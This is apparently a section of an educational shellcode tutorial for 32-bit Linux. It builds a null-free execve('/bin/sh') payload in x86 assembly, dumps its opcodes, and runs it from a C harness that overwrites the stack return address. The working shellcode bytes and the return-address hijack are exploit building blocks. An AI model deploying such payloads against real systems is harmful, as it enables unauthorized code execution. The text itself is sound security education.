5. Spawning a shell

Now it's time to write a shellcode to do something a little more useful. For instance, we can write a shellcode to spawn a shell (/bin/sh) and eventually exit cleanly. The simplest way to spawn a shell is using the execve(2) syscall. Let's take a look at its usage from its man page:

man 2 execve
EXECVE(2)                          Linux Programmer's Manual                         EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv [], char *const envp[]);

DESCRIPTION
       execve() executes the program pointed to by filename.  filename must be either a binary
       executable, or a script starting with a line of the form "#!  interpreter  [arg]".   In
       the  latter  case,  the interpreter must be a valid pathname for an executable which is
       not itself a script, which will be invoked as interpreter [arg] filename.

       argv is an array of argument strings passed to the new program.  envp is  an  array  of
       strings,  conventionally  of the form key=value, which are passed as environment to the
       new program.  Both, argv and envp must be terminated by a null pointer.   The  argument
       vector  and  environment can be accessed by the called program's main function, when it
       is defined as int main(int argc, char *argv[], char *envp[]).
[...]

To recap, we need to pass it three arguments:

  1. a pointer to the name of the program to execute (in our case a pointer to the string "/bin/sh");
  2. a pointer to an array of strings to pass as arguments to the program (the first argument must be argv[0], i.e. the name of the program itself). The last element of the array must be a null pointer;
  3. a pointer to an array of strings to pass as environment to the program. These strings are usually in the form "key=value" and the last element must be a null pointer.

Therefore, spawning a shell from a C program looks like:

get_shell.c
#include <unistd.h>

int main() {
        char *args[2];
        args[0] = "/bin/sh";
        args[1] = NULL;
        execve(args[0], args, NULL);
}

In the above example we passed to execve(2):

  1. a pointer to the string "/bin/sh";
  2. an array of two pointers (the first pointing to the string "/bin/sh" and the second null);
  3. a null pointer (we don't need any environment variables).

Now let's build it and see it work:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$

Ok, we got our shell! Now let's see how to use this system call in assembler (since there are only three arguments, we can use registers). We immediately have to tackle two problems:

To solve the first problem, we will make our shellcode able to put the null bytes in the right places at run-time. To solve the second problem, instead, we will use relative memory addressing.

The "classic" method to retrieve the address of the shellcode is to begin with a CALL instruction. The first thing a CALL instruction does is, in fact, pushing the address of the next byte onto the stack (to allow the RET instruction to insert this address in EIP upon return from the called function); then the execution jumps to the address specified by the parameter of the CALL instruction. This way we have obtained our starting point: the address of the first byte after the CALL is the last value on the stack and we can easily retrieve it with a POP instruction! Therefore, the overall structure of the shellcode will be:

jmp short mycall      ; Immediately jump to the call instruction

shellcode:
    pop   esi         ; Store the address of "/bin/sh" in ESI
    [...]

mycall:
    call  shellcode   ; Push the address of the next byte onto the stack: the next
    db    "/bin/sh"   ;   byte is the beginning of the string "/bin/sh"

Let's see what it does:

Now we can fill the structure of the shellcode with something useful. Let's see, step by step, what it will have to do:

  1. zero out EAX in order to have some null bytes available;
  2. terminate the string with a null byte, copying it from EAX (we will use the AL register);
  3. setup the array ECX will have to point to; it will be made up of the address of the string and a null pointer. We will accomplish this by writing the address of the string (stored in ESI) in the first free bytes right below the string, followed by the null pointer (once again we will use the zeroes in EAX);
  4. store the number of the syscall (0x0b) in EAX;
  5. store the first argument to execve(2) (i.e. the address of the string, saved in ESI) in EBX;
  6. store the address of the array in ECX (ESI+8);
  7. store the address of the null pointer in EDX (ESI+12);
  8. execute the interrupt 0x80.

This is the resulting assenbly code:

get_shell.asm
jmp short    mycall               ; Immediately jump to the call instruction

shellcode:
    pop        esi                ; Store the address of "/bin/sh" in ESI
    xor        eax, eax           ; Zero out EAX
    mov byte   [esi + 7], al      ; Write the null byte at the end of the string

    mov dword  [esi + 8],  esi    ; [ESI+8], i.e. the memory immediately below the string
                                  ;   "/bin/sh", will contain the array pointed to by the
                                  ;   second argument of execve(2); therefore we store in
                                  ;   [ESI+8] the address of the string...
    mov dword  [esi + 12], eax    ; ...and in [ESI+12] the NULL pointer (EAX is 0)
    mov        al,  0xb           ; Store the number of the syscall (11) in EAX
    lea        ebx, [esi]         ; Copy the address of the string in EBX
    lea        ecx, [esi + 8]     ; Second argument to execve(2)
    lea        edx, [esi + 12]    ; Third argument to execve(2) (NULL pointer)
    int        0x80               ; Execute the system call

mycall:
    call       shellcode          ; Push the address of "/bin/sh" onto the stack
    db         "/bin/sh"

Now let's extract the opcodes:

$ nasm -f elf get_shell.asm
$ ojdump -d get_shell.o

get_shell.o:     file format elf32-i386

Disassembly of section .text:

00000000 <shellcode-0x2>:
   0:   eb 18                   jmp    1a <mycall>

00000002 <shellcode>:
   2:   5e                      pop    %esi
   3:   31 c0                   xor    %eax,%eax
   5:   88 46 07                mov    %al,0x7(%esi)
   8:   89 76 08                mov    %esi,0x8(%esi)
   b:   89 46 0c                mov    %eax,0xc(%esi)
   e:   b0 0b                   mov    $0xb,%al
  10:   8d 1e                   lea    (%esi),%ebx
  12:   8d 4e 08                lea    0x8(%esi),%ecx
  15:   8d 56 0c                lea    0xc(%esi),%edx
  18:   cd 80                   int    $0x80

0000001a <mycall>:
  1a:   e8 e3 ff ff ff          call   2 <shellcode>
  1f:   2f                      das    
  20:   62 69 6e                bound  %ebp,0x6e(%ecx)
  23:   2f                      das    
  24:   73 68                   jae    8e <mycall+0x74>
$

insert them in the C program:

get_shell.c
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                   "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                   "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
}

and test it:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$